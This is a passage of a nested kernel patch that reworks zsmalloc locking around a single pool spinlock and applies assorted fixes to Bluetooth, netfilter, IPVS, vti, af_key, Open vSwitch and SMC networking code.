++	 * migration cannot move any zpages in this zspage. Here, pool->lock
+ 	 * is too heavy since callers would take some time until they calls
+ 	 * zs_unmap_object API so delegate the locking from class to zspage
+ 	 * which is smaller granularity.
+ 	 */
+ 	migrate_read_lock(zspage);
+-	read_unlock(&pool->migrate_lock);
++	spin_unlock(&pool->lock);
+ 
+ 	class = zspage_class(pool, zspage);
+ 	off = (class->size * obj_idx) & ~PAGE_MASK;
+@@ -1412,8 +1410,8 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 	size += ZS_HANDLE_SIZE;
+ 	class = pool->size_class[get_size_class_index(size)];
+ 
+-	/* class->lock effectively protects the zpage migration */
+-	spin_lock(&class->lock);
++	/* pool->lock effectively protects the zpage migration */
++	spin_lock(&pool->lock);
+ 	zspage = find_get_zspage(class);
+ 	if (likely(zspage)) {
+ 		obj = obj_malloc(pool, zspage, handle);
+@@ -1421,12 +1419,12 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 		fix_fullness_group(class, zspage);
+ 		record_obj(handle, obj);
+ 		class_stat_inc(class, OBJ_USED, 1);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 
+ 		return handle;
+ 	}
+ 
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 
+ 	zspage = alloc_zspage(pool, class, gfp);
+ 	if (!zspage) {
+@@ -1434,7 +1432,7 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 		return (unsigned long)ERR_PTR(-ENOMEM);
+ 	}
+ 
+-	spin_lock(&class->lock);
++	spin_lock(&pool->lock);
+ 	obj = obj_malloc(pool, zspage, handle);
+ 	newfg = get_fullness_group(class, zspage);
+ 	insert_zspage(class, zspage, newfg);
+@@ -1447,7 +1445,7 @@ unsigned long zs_malloc(struct zs_pool *pool, size_t size, gfp_t gfp)
+ 
+ 	/* We completely set up zspage so mark them as movable */
+ 	SetZsPageMovable(pool, zspage);
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 
+ 	return handle;
+ }
+@@ -1491,16 +1489,14 @@ void zs_free(struct zs_pool *pool, unsigned long handle)
+ 		return;
+ 
+ 	/*
+-	 * The pool->migrate_lock protects the race with zpage's migration
++	 * The pool->lock protects the race with zpage's migration
+ 	 * so it's safe to get the page from handle.
+ 	 */
+-	read_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	obj = handle_to_obj(handle);
+ 	obj_to_page(obj, &f_page);
+ 	zspage = get_zspage(f_page);
+ 	class = zspage_class(pool, zspage);
+-	spin_lock(&class->lock);
+-	read_unlock(&pool->migrate_lock);
+ 
+ 	obj_free(class->size, obj);
+ 	class_stat_dec(class, OBJ_USED, 1);
+@@ -1510,7 +1506,7 @@ void zs_free(struct zs_pool *pool, unsigned long handle)
+ 
+ 	free_zspage(pool, class, zspage);
+ out:
+-	spin_unlock(&class->lock);
++	spin_unlock(&pool->lock);
+ 	cache_free_handle(pool, handle);
+ }
+ EXPORT_SYMBOL_GPL(zs_free);
+@@ -1821,6 +1817,7 @@ static void replace_sub_page(struct size_class *class, struct zspage *zspage,
+ 
+ static bool zs_page_isolate(struct page *page, isolate_mode_t mode)
+ {
++	struct zs_pool *pool;
+ 	struct zspage *zspage;
+ 
+ 	/*
+@@ -1831,9 +1828,10 @@ static bool zs_page_isolate(struct page *page, isolate_mode_t mode)
+ 	VM_BUG_ON_PAGE(PageIsolated(page), page);
+ 
+ 	zspage = get_zspage(page);
+-	migrate_write_lock(zspage);
++	pool = zspage->pool;
++	spin_lock(&pool->lock);
+ 	inc_zspage_isolation(zspage);
+-	migrate_write_unlock(zspage);
++	spin_unlock(&pool->lock);
+ 
+ 	return true;
+ }
+@@ -1867,16 +1865,12 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 	pool = zspage->pool;
+ 
+ 	/*
+-	 * The pool migrate_lock protects the race between zpage migration
++	 * The pool's lock protects the race between zpage migration
+ 	 * and zs_free.
+ 	 */
+-	write_lock(&pool->migrate_lock);
++	spin_lock(&pool->lock);
+ 	class = zspage_class(pool, zspage);
+ 
+-	/*
+-	 * the class lock protects zpage alloc/free in the zspage.
+-	 */
+-	spin_lock(&class->lock);
+ 	/* the migrate_write_lock protects zpage access via zs_map_object */
+ 	migrate_write_lock(zspage);
+ 
+@@ -1904,13 +1898,12 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 	kunmap_atomic(s_addr);
+ 
+ 	replace_sub_page(class, zspage, newpage, page);
++	dec_zspage_isolation(zspage);
+ 	/*
+ 	 * Since we complete the data copy and set up new zspage structure,
+-	 * it's okay to release migration_lock.
++	 * it's okay to release the pool's lock.
+ 	 */
+-	write_unlock(&pool->migrate_lock);
+-	spin_unlock(&class->lock);
+-	dec_zspage_isolation(zspage);
++	spin_unlock(&pool->lock);
+ 	migrate_write_unlock(zspage);
+ 
+ 	get_page(newpage);
+@@ -1927,15 +1920,17 @@ static int zs_page_migrate(struct page *newpage, struct page *page,
+ 
+ static void zs_page_putback(struct page *page)
+ {
++	struct zs_pool *pool;
+ 	struct zspage *zspage;
+ 
+ 	VM_BUG_ON_PAGE(!PageMovable(page), page);
+ 	VM_BUG_ON_PAGE(!PageIsolated(page), page);
+ 
+ 	zspage = get_zspage(page);
+-	migrate_write_lock(zspage);
++	pool = zspage->pool;
++	spin_lock(&pool->lock);
+ 	dec_zspage_isolation(zspage);
+-	migrate_write_unlock(zspage);
++	spin_unlock(&pool->lock);
+ }
+ 
+ static const struct movable_operations zsmalloc_mops = {
+@@ -1964,9 +1959,9 @@ static void async_free_zspage(struct work_struct *work)
+ 		if (class->index != i)
+ 			continue;
+ 
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		list_splice_init(&class->fullness_list[ZS_EMPTY], &free_pages);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 	}
+ 
+ 	list_for_each_entry_safe(zspage, tmp, &free_pages, list) {
+@@ -1976,9 +1971,9 @@ static void async_free_zspage(struct work_struct *work)
+ 		get_zspage_mapping(zspage, &class_idx, &fullness);
+ 		VM_BUG_ON(fullness != ZS_EMPTY);
+ 		class = pool->size_class[class_idx];
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 		__free_zspage(pool, class, zspage);
+-		spin_unlock(&class->lock);
++		spin_unlock(&pool->lock);
+ 	}
+ };
+ 
+@@ -2039,10 +2034,11 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 	struct zspage *dst_zspage = NULL;
+ 	unsigned long pages_freed = 0;
+ 
+-	/* protect the race between zpage migration and zs_free */
+-	write_lock(&pool->migrate_lock);
+-	/* protect zpage allocation/free */
+-	spin_lock(&class->lock);
++	/*
++	 * protect the race between zpage migration and zs_free
++	 * as well as zpage allocation/free
++	 */
++	spin_lock(&pool->lock);
+ 	while ((src_zspage = isolate_zspage(class, true))) {
+ 		/* protect someone accessing the zspage(i.e., zs_map_object) */
+ 		migrate_write_lock(src_zspage);
+@@ -2067,7 +2063,7 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 			putback_zspage(class, dst_zspage);
+ 			migrate_write_unlock(dst_zspage);
+ 			dst_zspage = NULL;
+-			if (rwlock_is_contended(&pool->migrate_lock))
++			if (spin_is_contended(&pool->lock))
+ 				break;
+ 		}
+ 
+@@ -2084,11 +2080,9 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 			pages_freed += class->pages_per_zspage;
+ 		} else
+ 			migrate_write_unlock(src_zspage);
+-		spin_unlock(&class->lock);
+-		write_unlock(&pool->migrate_lock);
++		spin_unlock(&pool->lock);
+ 		cond_resched();
+-		write_lock(&pool->migrate_lock);
+-		spin_lock(&class->lock);
++		spin_lock(&pool->lock);
+ 	}
+ 
+ 	if (src_zspage) {
+@@ -2096,8 +2090,7 @@ static unsigned long __zs_compact(struct zs_pool *pool,
+ 		migrate_write_unlock(src_zspage);
+ 	}
+ 
+-	spin_unlock(&class->lock);
+-	write_unlock(&pool->migrate_lock);
++	spin_unlock(&pool->lock);
+ 
+ 	return pages_freed;
+ }
+@@ -2108,6 +2101,15 @@ unsigned long zs_compact(struct zs_pool *pool)
+ 	struct size_class *class;
+ 	unsigned long pages_freed = 0;
+ 
++	/*
++	 * Pool compaction is performed under pool->lock so it is basically
++	 * single-threaded. Having more than one thread in __zs_compact()
++	 * will increase pool->lock contention, which will impact other
++	 * zsmalloc operations that need pool->lock.
++	 */
++	if (atomic_xchg(&pool->compaction_in_progress, 1))
++		return 0;
++
+ 	for (i = ZS_SIZE_CLASSES - 1; i >= 0; i--) {
+ 		class = pool->size_class[i];
+ 		if (class->index != i)
+@@ -2115,6 +2117,7 @@ unsigned long zs_compact(struct zs_pool *pool)
+ 		pages_freed += __zs_compact(pool, class);
+ 	}
+ 	atomic_long_add(pages_freed, &pool->stats.pages_compacted);
++	atomic_set(&pool->compaction_in_progress, 0);
+ 
+ 	return pages_freed;
+ }
+@@ -2200,7 +2203,8 @@ struct zs_pool *zs_create_pool(const char *name)
+ 		return NULL;
+ 
+ 	init_deferred_free(pool);
+-	rwlock_init(&pool->migrate_lock);
++	spin_lock_init(&pool->lock);
++	atomic_set(&pool->compaction_in_progress, 0);
+ 
+ 	pool->name = kstrdup(name, GFP_KERNEL);
+ 	if (!pool->name)
+@@ -2271,7 +2275,6 @@ struct zs_pool *zs_create_pool(const char *name)
+ 		class->index = i;
+ 		class->pages_per_zspage = pages_per_zspage;
+ 		class->objs_per_zspage = objs_per_zspage;
+-		spin_lock_init(&class->lock);
+ 		pool->size_class[i] = class;
+ 		for (fullness = ZS_EMPTY; fullness < NR_ZS_FULLNESS;
+ 							fullness++)
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 02fc9961464cf..a7899857aee5d 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -6375,9 +6375,14 @@ static inline int l2cap_le_command_rej(struct l2cap_conn *conn,
+ 	if (!chan)
+ 		goto done;
+ 
++	chan = l2cap_chan_hold_unless_zero(chan);
++	if (!chan)
++		goto done;
++
+ 	l2cap_chan_lock(chan);
+ 	l2cap_chan_del(chan, ECONNREFUSED);
+ 	l2cap_chan_unlock(chan);
++	l2cap_chan_put(chan);
+ 
+ done:
+ 	mutex_unlock(&conn->chan_lock);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 89c94f3e96bc3..d2e8565d0b33f 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -7277,7 +7277,7 @@ static void get_conn_info_complete(struct hci_dev *hdev, void *data, int err)
+ 
+ 	bt_dev_dbg(hdev, "err %d", err);
+ 
+-	memcpy(&rp.addr, &cp->addr.bdaddr, sizeof(rp.addr));
++	memcpy(&rp.addr, &cp->addr, sizeof(rp.addr));
+ 
+ 	status = mgmt_status(err);
+ 	if (status == MGMT_STATUS_SUCCESS) {
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 3b5304f084ef3..509773919d302 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3099,7 +3099,7 @@ void __sk_mem_reduce_allocated(struct sock *sk, int amount)
+ 	if (mem_cgroup_sockets_enabled && sk->sk_memcg)
+ 		mem_cgroup_uncharge_skmem(sk->sk_memcg, amount);
+ 
+-	if (sk_under_memory_pressure(sk) &&
++	if (sk_under_global_memory_pressure(sk) &&
+ 	    (sk_memory_allocated(sk) < sk_prot_mem_limits(sk, 0)))
+ 		sk_leave_memory_pressure(sk);
+ }
+diff --git a/net/ipv4/ip_vti.c b/net/ipv4/ip_vti.c
+index 8c2bd1d9ddce3..615c1dcf3a28e 100644
+--- a/net/ipv4/ip_vti.c
++++ b/net/ipv4/ip_vti.c
+@@ -287,12 +287,12 @@ static netdev_tx_t vti_tunnel_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		break;
+ 	case htons(ETH_P_IPV6):
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		break;
+ 	default:
+ 		goto tx_err;
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 0b5d0a2867a8c..cf354c29ec123 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -586,7 +586,9 @@ out_reset_timer:
+ 	    tcp_stream_is_thin(tp) &&
+ 	    icsk->icsk_retransmits <= TCP_THIN_LINEAR_RETRIES) {
+ 		icsk->icsk_backoff = 0;
+-		icsk->icsk_rto = min(__tcp_set_rto(tp), TCP_RTO_MAX);
++		icsk->icsk_rto = clamp(__tcp_set_rto(tp),
++				       tcp_rto_min(sk),
++				       TCP_RTO_MAX);
+ 	} else {
+ 		/* Use normal (exponential) backoff */
+ 		icsk->icsk_rto = min(icsk->icsk_rto << 1, TCP_RTO_MAX);
+diff --git a/net/ipv6/ip6_vti.c b/net/ipv6/ip6_vti.c
+index 151337d7f67b4..cb71463bbbabd 100644
+--- a/net/ipv6/ip6_vti.c
++++ b/net/ipv6/ip6_vti.c
+@@ -570,12 +570,12 @@ vti6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		    vti6_addr_conflict(t, ipv6_hdr(skb)))
+ 			goto tx_err;
+ 
+-		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		memset(IP6CB(skb), 0, sizeof(*IP6CB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET6);
+ 		break;
+ 	case htons(ETH_P_IP):
+-		xfrm_decode_session(skb, &fl, AF_INET);
+ 		memset(IPCB(skb), 0, sizeof(*IPCB(skb)));
++		xfrm_decode_session(skb, &fl, AF_INET);
+ 		break;
+ 	default:
+ 		goto tx_err;
+diff --git a/net/key/af_key.c b/net/key/af_key.c
+index 8c21de50eadf8..8a8f2429d5d99 100644
+--- a/net/key/af_key.c
++++ b/net/key/af_key.c
+@@ -1848,9 +1848,9 @@ static int pfkey_dump(struct sock *sk, struct sk_buff *skb, const struct sadb_ms
+ 	if (ext_hdrs[SADB_X_EXT_FILTER - 1]) {
+ 		struct sadb_x_filter *xfilter = ext_hdrs[SADB_X_EXT_FILTER - 1];
+ 
+-		if ((xfilter->sadb_x_filter_splen >=
++		if ((xfilter->sadb_x_filter_splen >
+ 			(sizeof(xfrm_address_t) << 3)) ||
+-		    (xfilter->sadb_x_filter_dplen >=
++		    (xfilter->sadb_x_filter_dplen >
+ 			(sizeof(xfrm_address_t) << 3))) {
+ 			mutex_unlock(&pfk->dump_lock);
+ 			return -EINVAL;
+diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
+index 03af6a2ffd567..17a1b731a76b1 100644
+--- a/net/netfilter/ipvs/ip_vs_ctl.c
++++ b/net/netfilter/ipvs/ip_vs_ctl.c
+@@ -1798,6 +1798,7 @@ static int
+ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		       void *buffer, size_t *lenp, loff_t *ppos)
+ {
++	struct netns_ipvs *ipvs = table->extra2;
+ 	int *valp = table->data;
+ 	int val[2];
+ 	int rc;
+@@ -1807,6 +1808,7 @@ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		.mode = table->mode,
+ 	};
+ 
++	mutex_lock(&ipvs->sync_mutex);
+ 	memcpy(val, valp, sizeof(val));
+ 	rc = proc_dointvec(&tmp, write, buffer, lenp, ppos);
+ 	if (write) {
+@@ -1816,6 +1818,7 @@ proc_do_sync_threshold(struct ctl_table *table, int write,
+ 		else
+ 			memcpy(valp, val, sizeof(val));
+ 	}
++	mutex_unlock(&ipvs->sync_mutex);
+ 	return rc;
+ }
+ 
+@@ -4080,6 +4083,7 @@ static int __net_init ip_vs_control_net_init_sysctl(struct netns_ipvs *ipvs)
+ 	ipvs->sysctl_sync_threshold[0] = DEFAULT_SYNC_THRESHOLD;
+ 	ipvs->sysctl_sync_threshold[1] = DEFAULT_SYNC_PERIOD;
+ 	tbl[idx].data = &ipvs->sysctl_sync_threshold;
++	tbl[idx].extra2 = ipvs;
+ 	tbl[idx++].maxlen = sizeof(ipvs->sysctl_sync_threshold);
+ 	ipvs->sysctl_sync_refresh_period = DEFAULT_SYNC_REFRESH_PERIOD;
+ 	tbl[idx++].data = &ipvs->sysctl_sync_refresh_period;
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 895e0ca542994..7247af51bdfc4 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -49,8 +49,8 @@ static const unsigned int sctp_timeouts[SCTP_CONNTRACK_MAX] = {
+ 	[SCTP_CONNTRACK_COOKIE_WAIT]		= 3 SECS,
+ 	[SCTP_CONNTRACK_COOKIE_ECHOED]		= 3 SECS,
+ 	[SCTP_CONNTRACK_ESTABLISHED]		= 210 SECS,
+-	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 300 SECS / 1000,
+-	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 300 SECS / 1000,
++	[SCTP_CONNTRACK_SHUTDOWN_SENT]		= 3 SECS,
++	[SCTP_CONNTRACK_SHUTDOWN_RECD]		= 3 SECS,
+ 	[SCTP_CONNTRACK_SHUTDOWN_ACK_SENT]	= 3 SECS,
+ 	[SCTP_CONNTRACK_HEARTBEAT_SENT]		= 30 SECS,
+ };
+@@ -105,7 +105,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ 	{
+ /*	ORIGINAL	*/
+ /*                  sNO, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS */
+-/* init         */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCW},
++/* init         */ {sCL, sCL, sCW, sCE, sES, sCL, sCL, sSA, sCW},
+ /* init_ack     */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},
+ /* abort        */ {sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL, sCL},
+ /* shutdown     */ {sCL, sCL, sCW, sCE, sSS, sSS, sSR, sSA, sCL},
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index f6e6273838859..4c2df7af73f76 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -6874,6 +6874,7 @@ static int nft_set_catchall_flush(const struct nft_ctx *ctx,
+ 		ret = __nft_set_catchall_flush(ctx, set, &elem);
+ 		if (ret < 0)
+ 			break;
++		nft_set_elem_change_active(ctx->net, set, ext);
+ 	}
+ 
+ 	return ret;
+diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
+index e65a83328b554..cf9a1ae87d9b1 100644
+--- a/net/netfilter/nft_dynset.c
++++ b/net/netfilter/nft_dynset.c
+@@ -191,6 +191,9 @@ static int nft_dynset_init(const struct nft_ctx *ctx,
+ 	if (IS_ERR(set))
+ 		return PTR_ERR(set);
+ 
++	if (set->flags & NFT_SET_OBJECT)
++		return -EOPNOTSUPP;
++
+ 	if (set->ops->update == NULL)
+ 		return -EOPNOTSUPP;
+ 
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index a81829c10feab..32cfd0a84b0e2 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1665,6 +1665,17 @@ static void nft_pipapo_commit(const struct nft_set *set)
+ 	priv->clone = new_clone;
+ }
+ 
++static bool nft_pipapo_transaction_mutex_held(const struct nft_set *set)
++{
++#ifdef CONFIG_PROVE_LOCKING
++	const struct net *net = read_pnet(&set->net);
++
++	return lockdep_is_held(&nft_pernet(net)->commit_mutex);
++#else
++	return true;
++#endif
++}
++
+ static void nft_pipapo_abort(const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+@@ -1673,7 +1684,7 @@ static void nft_pipapo_abort(const struct nft_set *set)
+ 	if (!priv->dirty)
+ 		return;
+ 
+-	m = rcu_dereference(priv->match);
++	m = rcu_dereference_protected(priv->match, nft_pipapo_transaction_mutex_held(set));
+ 
+ 	new_clone = pipapo_clone(m);
+ 	if (IS_ERR(new_clone))
+diff --git a/net/openvswitch/datapath.c b/net/openvswitch/datapath.c
+index 5920fdca12875..3c7b245354096 100644
+--- a/net/openvswitch/datapath.c
++++ b/net/openvswitch/datapath.c
+@@ -1806,7 +1806,7 @@ static int ovs_dp_cmd_new(struct sk_buff *skb, struct genl_info *info)
+ 	parms.port_no = OVSP_LOCAL;
+ 	parms.upcall_portids = a[OVS_DP_ATTR_UPCALL_PID];
+ 	parms.desired_ifindex = a[OVS_DP_ATTR_IFINDEX]
+-		? nla_get_u32(a[OVS_DP_ATTR_IFINDEX]) : 0;
++		? nla_get_s32(a[OVS_DP_ATTR_IFINDEX]) : 0;
+ 
+ 	/* So far only local changes have been made, now need the lock. */
+ 	ovs_lock();
+@@ -2026,7 +2026,7 @@ static const struct nla_policy datapath_policy[OVS_DP_ATTR_MAX + 1] = {
+ 	[OVS_DP_ATTR_USER_FEATURES] = { .type = NLA_U32 },
+ 	[OVS_DP_ATTR_MASKS_CACHE_SIZE] =  NLA_POLICY_RANGE(NLA_U32, 0,
+ 		PCPU_MIN_UNIT_SIZE / sizeof(struct mask_cache_entry)),
+-	[OVS_DP_ATTR_IFINDEX] = {.type = NLA_U32 },
++	[OVS_DP_ATTR_IFINDEX] = NLA_POLICY_MIN(NLA_S32, 0),
+ };
+ 
+ static const struct genl_small_ops dp_datapath_genl_ops[] = {
+@@ -2276,7 +2276,7 @@ restart:
+ 	parms.port_no = port_no;
+ 	parms.upcall_portids = a[OVS_VPORT_ATTR_UPCALL_PID];
+ 	parms.desired_ifindex = a[OVS_VPORT_ATTR_IFINDEX]
+-		? nla_get_u32(a[OVS_VPORT_ATTR_IFINDEX]) : 0;
++		? nla_get_s32(a[OVS_VPORT_ATTR_IFINDEX]) : 0;
+ 
+ 	vport = new_vport(&parms);
+ 	err = PTR_ERR(vport);
+@@ -2513,7 +2513,7 @@ static const struct nla_policy vport_policy[OVS_VPORT_ATTR_MAX + 1] = {
+ 	[OVS_VPORT_ATTR_TYPE] = { .type = NLA_U32 },
+ 	[OVS_VPORT_ATTR_UPCALL_PID] = { .type = NLA_UNSPEC },
+ 	[OVS_VPORT_ATTR_OPTIONS] = { .type = NLA_NESTED },
+-	[OVS_VPORT_ATTR_IFINDEX] = { .type = NLA_U32 },
++	[OVS_VPORT_ATTR_IFINDEX] = NLA_POLICY_MIN(NLA_S32, 0),
+ 	[OVS_VPORT_ATTR_NETNSID] = { .type = NLA_S32 },
+ };
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 5712a5297bd01..84219c5121bc2 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -379,8 +379,8 @@ static struct sock *smc_sock_alloc(struct net *net, struct socket *sock,
+ 	sk->sk_state = SMC_INIT;
+ 	sk->sk_destruct = smc_destruct;
+ 	sk->sk_protocol = protocol;
+-	WRITE_ONCE(sk->sk_sndbuf, READ_ONCE(net->smc.sysctl_wmem));
+-	WRITE_ONCE(sk->sk_rcvbuf, READ_ONCE(net->smc.sysctl_rmem));
++	WRITE_ONCE(sk->sk_sndbuf, 2 * READ_ONCE(net->smc.sysctl_wmem));
++	WRITE_ONCE(sk->sk_rcvbuf, 2 * READ_ONCE(net->smc.sysctl_rmem));
+ 	smc = smc_sk(sk);
+ 	INIT_WORK(&smc->tcp_listen_work, smc_tcp_listen_work);
+ 	INIT_WORK(&smc->connect_work, smc_connect_work);
+diff --git a/net/smc/smc.h b/net/smc/smc.h
+index 5ed765ea0c731..1d36720fc019c 100644
+--- a/net/smc/smc.h
++++ b/net/smc/smc.h
+@@ -161,7 +161,7 @@ struct smc_connection {
+ 
+ 	struct smc_buf_desc	*sndbuf_desc;	/* send buffer descriptor */
+ 	struct smc_buf_desc	*rmb_desc;	/* RMBE descriptor */
+-	int			rmbe_size_short;/* compressed notation */
++	int                     rmbe_size_comp; /* compressed notation */
+ 	int			rmbe_update_limit;
+ 						/* lower limit for consumer
+ 						 * cursor update
+diff --git a/net/smc/smc_clc.c b/net/smc/smc_clc.c
+index dfb9797f7bc63..9b8999e2afca5 100644
+--- a/net/smc/smc_clc.c
++++ b/net/smc/smc_clc.c
+@@ -1002,7 +1002,7 @@ static int smc_clc_send_confirm_accept(struct smc_sock *smc,
+ 		clc->hdr.typev1 = SMC_TYPE_D;
+ 		clc->d0.gid = conn->lgr->smcd->local_gid;
+ 		clc->d0.token = conn->rmb_desc->token;
+-		clc->d0.dmbe_size = conn->rmbe_size_short;
++		clc->d0.dmbe_size = conn->rmbe_size_comp;
+ 		clc->d0.dmbe_idx = 0;
+ 		memcpy(&clc->d0.linkid, conn->lgr->id, SMC_LGR_ID_SIZE);
+ 		if (version == SMC_V1) {
+@@ -1045,7 +1045,7 @@ static int smc_clc_send_confirm_accept(struct smc_sock *smc,
+ 			clc->r0.qp_mtu = min(link->path_mtu, link->peer_mtu);
+ 			break;
+ 		}
+-		clc->r0.rmbe_size = conn->rmbe_size_short;
++		clc->r0.rmbe_size = conn->rmbe_size_comp;
+ 		clc->r0.rmb_dma_addr = conn->rmb_desc->is_vm ?
+ 			cpu_to_be64((uintptr_t)conn->rmb_desc->cpu_addr) :
+ 			cpu_to_be64((u64)sg_dma_address
+diff --git a/net/smc/smc_core.c b/net/smc/smc_core.c
+index f82f43573a159..c676d92af7b7d 100644
+--- a/net/smc/smc_core.c
++++ b/net/smc/smc_core.c
+@@ -852,8 +852,8 @@ static int smc_lgr_create(struct smc_sock *smc, struct smc_init_info *ini)
+ 	lgr->freeing = 0;
+ 	lgr->vlan_id = ini->vlan_id;
+ 	refcount_set(&lgr->refcnt, 1); /* set lgr refcnt to 1 */
+-	mutex_init(&lgr->sndbufs_lock);
+-	mutex_init(&lgr->rmbs_lock);
++	init_rwsem(&lgr->sndbufs_lock);
++	init_rwsem(&lgr->rmbs_lock);
+ 	rwlock_init(&lgr->conns_lock);
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+ 		INIT_LIST_HEAD(&lgr->sndbufs[i]);
+@@ -1095,7 +1095,7 @@ err_out:
+ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 			   struct smc_link_group *lgr)
+ {
+-	struct mutex *lock;	/* lock buffer list */
++	struct rw_semaphore *lock;	/* lock buffer list */
+ 	int rc;
+ 
+ 	if (is_rmb && buf_desc->is_conf_rkey && !list_empty(&lgr->list)) {
+@@ -1115,9 +1115,9 @@ static void smcr_buf_unuse(struct smc_buf_desc *buf_desc, bool is_rmb,
+ 		/* buf registration failed, reuse not possible */
+ 		lock = is_rmb ? &lgr->rmbs_lock :
+ 				&lgr->sndbufs_lock;
+-		mutex_lock(lock);
++		down_write(lock);
+ 		list_del(&buf_desc->list);
+-		mutex_unlock(lock);
++		up_write(lock);
+ 
+ 		smc_buf_free(lgr, is_rmb, buf_desc);
+ 	} else {
+@@ -1220,15 +1220,16 @@ static void smcr_buf_unmap_lgr(struct smc_link *lnk)
+ 	int i;
+ 
+ 	for (i = 0; i < SMC_RMBE_SIZES; i++) {
+-		mutex_lock(&lgr->rmbs_lock);
++		down_write(&lgr->rmbs_lock);
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->rmbs[i], list)
+ 			smcr_buf_unmap_link(buf_desc, true, lnk);
+-		mutex_unlock(&lgr->rmbs_lock);
+-		mutex_lock(&lgr->sndbufs_lock);
++		up_write(&lgr->rmbs_lock);
++
++		down_write(&lgr->sndbufs_lock);
+ 		list_for_each_entry_safe(buf_desc, bf, &lgr->sndbufs[i],
+ 					 list)
+ 			smcr_buf_unmap_link(buf_desc, false, lnk);
+-		mutex_unlock(&lgr->sndbufs_lock);
++		up_write(&lgr->sndbufs_lock);
+ 	}
+ }
+ 
+@@ -1986,19 +1987,19 @@ int smc_uncompress_bufsize(u8 compressed)
+  * buffer size; if not available, return NULL
+  */
+ static struct smc_buf_desc *smc_buf_get_slot(int compressed_bufsize,
+-					     struct mutex *lock,
++					     struct rw_semaphore *lock,
+ 					     struct list_head *buf_list)
+ {
+ 	struct smc_buf_desc *buf_slot;
+ 
+-	mutex_lock(lock);
++	down_read(lock);
+ 	list_for_each_entry(buf_slot, buf_list, list) {
+ 		if (cmpxchg(&buf_slot->used, 0, 1) == 0) {
+-			mutex_unlock(lock);
++			up_read(lock);
+ 			return buf_slot;
+ 		}
+ 	}
+-	mutex_unlock(lock);
++	up_read(lock);
+ 	return NULL;
+ }
+ 
+@@ -2107,13 +2108,13 @@ int smcr_link_reg_buf(struct smc_link *link, struct smc_buf_desc *buf_desc)
+ 	return 0;
+ }
+ 
+-static int _smcr_buf_map_lgr(struct smc_link *lnk, struct mutex *lock,
++static int _smcr_buf_map_lgr(struct smc_link *lnk, struct rw_semaphore *lock,
+ 			     struct list_head *lst, bool is_rmb)
+ {
+ 	struct smc_buf_desc *buf_desc, *bf;
+ 	int rc = 0;
+ 
+-	mutex_lock(lock);
++	down_write(lock);
+ 	list_for_each_entry_safe(buf_desc, bf, lst, list) {
+ 		if (!buf_desc->used)
+ 			continue;
